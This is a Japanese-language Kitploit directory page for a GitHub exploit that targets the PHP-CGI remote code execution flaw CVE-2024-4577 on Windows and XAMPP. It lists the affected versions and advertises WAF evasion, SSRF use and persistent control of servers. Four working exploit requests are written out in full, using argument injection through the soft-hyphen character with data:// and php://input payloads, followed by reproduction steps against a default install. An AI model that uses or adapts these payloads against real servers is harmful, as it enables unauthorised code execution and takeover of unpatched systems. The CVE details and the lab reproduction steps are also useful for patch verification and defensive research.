Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4577-PHP-RCE — [脆弱性再現] 世界初のPHPデフォルト環境(XAMPP)を利用したCVE-2024-4577 PHP-CGI RCE 脆弱性 EXP。 | Kitploit
ツール/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストペイロード開発
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[脆弱性再現] 世界初のPHPデフォルト環境(XAMPP)を利用したCVE-2024-4577 PHP-CGI RCE 脆弱性 EXP。

リポジトリを見る
1623342年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577-PHP-RCE

プロジェクト概要と原理

  • PHPのデフォルト環境(XAMPP)を利用した世界初のCVE-2024-4577 PHP-CGI RCEエクスプロイト。
  • PHPデフォルト環境を利用した世界初のCVE-2024-4577 PHP-CGI RCEエクスプロイト。オリジナルエクスプロイトを共有し、SSRFをサポートし、WAFバイパスをサポートします。
  • PHPデフォルト環境でのRCEを実現。原理:cgi.force_redirect + REDIRECT-STATUS。
  • オリジナルの新しいEXPを追加し、WAFバイパスシナリオの手法をサポート。原理:FastCGIサーバー + FastCGIプロトコル通信。
  • オリジナルの新しいEXPを追加し、SSRFシナリオの手法をサポート。原理:data://プロトコル + GETリクエスト。

EXP 1 の利点

  • allow_url_include、auto_prepend_file、auto_append_file を必要とせずにRCE可能。任意のファイルやPHPファイルを含めることができます。
  • WAFが頻繁にブロックするキーワード allow_url_include、auto_prepend_file、 が出現しません。
auto_append_file
  • FastCGIサーバーのすべての通信はWAFに記録されません。
  • 新しいポートをリッスンするため、PHPサーバーを永続的に制御でき、ApacheやPHPから独立しています。
  • 脆弱性概要

    情報内容
    脆弱性名PHP RCE
    脆弱性IDCVE-2024-4577
    リスクレベル高
    脆弱性タイプRCE
    悪用難易度低

    影響を受けるバージョン

    • PHP Windows版 8.3.0 <= 影響を受けるバージョン < 8.3.8
    • PHP Windows版 8.2.0 <= 影響を受けるバージョン < 8.2.20
    • PHP Windows版 8.1.0 <= 影響を受けるバージョン < 8.1.29
    • PHP Windows版 影響を受けるバージョン == 8.0.x
    • PHP Windows版 影響を受けるバージョン == 7.x
    • PHP Windows版 影響を受けるバージョン == 5.x
    • XAMPP Windows版 8.2.0 <= 影響を受けるバージョン <= 8.2.12
    • XAMPP Windows版 8.1.0 <= 影響を受けるバージョン <= 8.1.25
    • XAMPP Windows版 影響を受けるバージョン == 8.0.x
    • XAMPP Windows版 影響を受けるバージョン == 7.x
    • XAMPP Windows版 影響を受けるバージョン == 5.x

    EXP 1

    WAFバイパスシナリオ + デフォルトシナリオで使用可能:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    例:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    SSRFシナリオ + デフォルトシナリオで使用可能:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    デフォルトシナリオで使用可能:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    デフォルトシナリオで使用可能:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    再現

    1. サーバー環境:
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. サーバーにXAMPPをダウンロードしてインストール:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    
    1. サーバー設定
    root@kitploit:~
    无需任何修改,保持默认配置
    
    1. クライアントでEXPを使用
    root@kitploit:~
    使用上述EXP进行测试
    
    1. 検証
    root@kitploit:~
    观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
    
    ツールをダウンロード